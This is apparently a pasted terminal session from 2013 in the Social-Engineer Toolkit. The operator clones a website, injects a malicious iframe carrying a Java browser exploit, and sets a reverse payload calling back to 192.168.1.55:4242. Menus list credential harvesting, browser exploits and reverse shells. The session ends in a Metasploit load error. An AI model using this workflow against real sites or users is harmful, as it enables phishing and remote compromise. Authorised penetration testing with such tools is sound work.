
SET Output

a guest
Apr 13th, 2013
..######..########.########
.##....##.##..........##...
.##.......##..........##...
..######..######......##...
.......##.##..........##...
.##....##.##..........##...
..######..########....##...

[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
[---] Version: 4.7.2 [---]
[---] Codename: 'Headshot' [---]
[---] Follow us on Twitter: @trustedsec [---]
[---] Follow me on Twitter: @dave_rel1k [---]
[---] Homepage: https://www.trustedsec.com [---]

Welcome to the Social-Engineer Toolkit (SET). The one
stop shop for all of your social-engineering needs.

Join us on irc.freenode.net in channel #setoolkit

The Social-Engineer Toolkit is a product of TrustedSec.

Visit: https://www.trustedsec.com

Select from the menu:

1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About

99) Exit the Social-Engineer Toolkit

set> 1

[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
[---] Version: 4.7.2 [---]
[---] Codename: 'Headshot' [---]
[---] Follow us on Twitter: @trustedsec [---]
[---] Follow me on Twitter: @dave_rel1k [---]
[---] Homepage: https://www.trustedsec.com [---]

Welcome to the Social-Engineer Toolkit (SET). The one
stop shop for all of your social-engineering needs.

Join us on irc.freenode.net in channel #setoolkit

The Social-Engineer Toolkit is a product of TrustedSec.

Visit: https://www.trustedsec.com

Select from the menu:

1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules

99) Return back to the main menu.

set> 2

The Web Attack module is a unique way of utilizing multiple web-based attacks
in order to compromise the intended victim.

The Java Applet Attack method will spoof a Java Certificate and deliver a
metasploit based payload. Uses a customized java applet created by Thomas
Werth to deliver the payload.

The Metasploit Browser Exploit method will utilize select Metasploit
browser exploits through an iframe and deliver a Metasploit payload.

The Credential Harvester method will utilize web cloning of a web-
site that has a username and password field and harvest all the
information posted to the website.

The TabNabbing method will wait for a user to move to a different
tab, then refresh the page to something different.

The Man Left in the Middle Attack method was introduced by Kos and
utilizes HTTP REFERER's in order to intercept fields and harvest
data from them. You need to have an already vulnerable site and in-
corporate <script src="http://YOURIP/">. This could either be from a
compromised site or through XSS.

The Web-Jacking Attack method was introduced by white_sheep, Emgent
and the Back|Track team. This method utilizes iframe replacements to
make the highlighted URL link to appear legitimate however when clicked
a window pops up then is replaced with the malicious link. You can edit
the link replacement settings in the set_config if its too slow/fast.

The Multi-Attack method will add a combination of attacks through the web attack
menu. For example you can utilize the Java Applet, Metasploit Browser,
Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
all at once to see which is successful.

1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Man Left in the Middle Attack Method
6) Web Jacking Attack Method
7) Multi-Attack Web Method
8) Create or import a CodeSigning Certificate

99) Return to Main Menu

set:webattack>2

The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.

The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.

The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.

1) Web Templates
2) Site Cloner
3) Custom Import

99) Return to Webattack Menu

set:webattack>2
[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: no
[-] Enter the IP address of your interface IP or if your using an external IP, what
[-] will be used for the connection back and to house the web server (your interface address)
set:webattack> IP address or hostname for the reverse connection:192.168.1.55
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:http://www.tblop.com

Enter the browser exploit you would like to use [8]:

1) Java Applet JMX Remote Code Execution (UPDATED 2013-01-19)Java Applet JMX Remote Code Execution (2013-01-10)
2) Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free (2012-12-27)
3) Java 7 Applet Remote Code Execution (2012-08-26)
4) Microsoft Internet Explorer execCommand Use-After-Free Vulnerability (2012-09-14)
5) Java AtomicReferenceArray Type Violation Vulnerability (2012-02-14)
6) Java Applet Field Bytecode Verifier Cache Remote Code Execution (2012-06-06)
7) MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption (2012-06-12)
8) Microsoft XML Core Services MSXML Uninitialized Memory Corruption (2012-06-12)
9) Adobe Flash Player Object Type Confusion (2012-05-04)
10) Adobe Flash Player MP4 "cprt" Overflow (2012-02-15)
11) MS12-004 midiOutPlayNextPolyEvent Heap Overflow (2012-01-10)
12) Java Applet Rhino Script Engine Remote Code Execution (2011-10-18)
13) MS11-050 IE mshtml!CObjectElement Use After Free (2011-06-16)
14) Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability (2011-04-11)
15) Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute (2011-06-01)
16) Internet Explorer CSS Import Use After Free (2010-11-29)
17) Microsoft WMI Administration Tools ActiveX Buffer Overflow (2010-12-21)
18) Internet Explorer CSS Tags Memory Corruption (2010-11-03)
19) Sun Java Applet2ClassLoader Remote Code Execution (2011-02-15)
20) Sun Java Runtime New Plugin docbase Buffer Overflow (2010-10-12)
21) Microsoft Windows WebDAV Application DLL Hijacker (2010-08-18)
22) Adobe Flash Player AVM Bytecode Verification Vulnerability (2011-03-15)
23) Adobe Shockwave rcsL Memory Corruption Exploit (2010-10-21)
24) Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow (2010-09-07)
25) Apple QuickTime 7.6.7 Marshaled_pUnk Code Execution (2010-08-30)
26) Microsoft Help Center XSS and Command Execution (2010-06-09)
27) Microsoft Internet Explorer iepeers.dll Use After Free (2010-03-09)
28) Microsoft Internet Explorer "Aurora" Memory Corruption (2010-01-14)
29) Microsoft Internet Explorer Tabular Data Control Exploit (2010-03-0)
30) Microsoft Internet Explorer 7 Uninitialized Memory Corruption (2009-02-10)
31) Microsoft Internet Explorer Style getElementsbyTagName Corruption (2009-11-20)
32) Microsoft Internet Explorer isComponentInstalled Overflow (2006-02-24)
33) Microsoft Internet Explorer Explorer Data Binding Corruption (2008-12-07)
34) Microsoft Internet Explorer Unsafe Scripting Misconfiguration (2010-09-20)
35) FireFox 3.5 escape Return Value Memory Corruption (2009-07-13)
36) FireFox 3.6.16 mChannel use after free vulnerability (2011-05-10)
37) Metasploit Browser Autopwn (USE AT OWN RISK!)

set:payloads>1


1) Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker
2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker
3) Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker
4) Windows Bind Shell Execute payload and create an accepting port on remote system.
5) Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline
6) Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline
7) Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter
8) Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports
9) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
10) Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and use Reverse Meterpreter
11) Download/Run your Own Executable Downloads an executable and runs it

set:payloads>11
[*] Selecting Java Meterpreter as payload since it is exploit specific.
set:payloads> Port to use for the reverse [443]:4242

[*] Cloning the website: http://www.tblop.com
[*] This could take a little bit...
[*] Injecting iframes into cloned website for MSF Attack....
[*] Malicious iframe injection successful...crafting payload.

[*] Apache appears to be running, moving files into Apache's home

***************************************************
Web Server Launched. Welcome to the SET Web Attack.
***************************************************

[--] Tested on Windows, Linux, and OSX [--]
[--] Apache web server is currently in use for performance. [--]
[*] Moving payload into cloned website.
[*] The site has been moved. SET Web Server is now listening..
[-] Launching MSF Listener...
[-] This may take a few to load MSF...
/opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require': no such file to load -- rubygems (LoadError)
from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
from <internal:gem_prelude>:158:in `load_full_rubygems_library'
from <internal:gem_prelude>:270:in `const_missing'
from /opt/metasploit/apps/pro/msf3/lib/msf/sanity.rb:40:in `<top (required)>'
from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
from /opt/metasploit/apps/pro/msf3/lib/msf/core.rb:14:in `<top (required)>'
from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
from /opt/metasploit/apps/pro/msf3/lib/msf/ui/console/driver.rb:2:in `<top (required)>'
from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
from /opt/metasploit/apps/pro/msf3/lib/msf/ui/console.rb:11:in `<top (required)>'
from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
from /opt/metasploit/apps/pro/msf3/lib/msf/ui.rb:11:in `<top (required)>'
from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
from /opt/metasploit/apps/pro/msf3//msfconsole:136:in `<main>'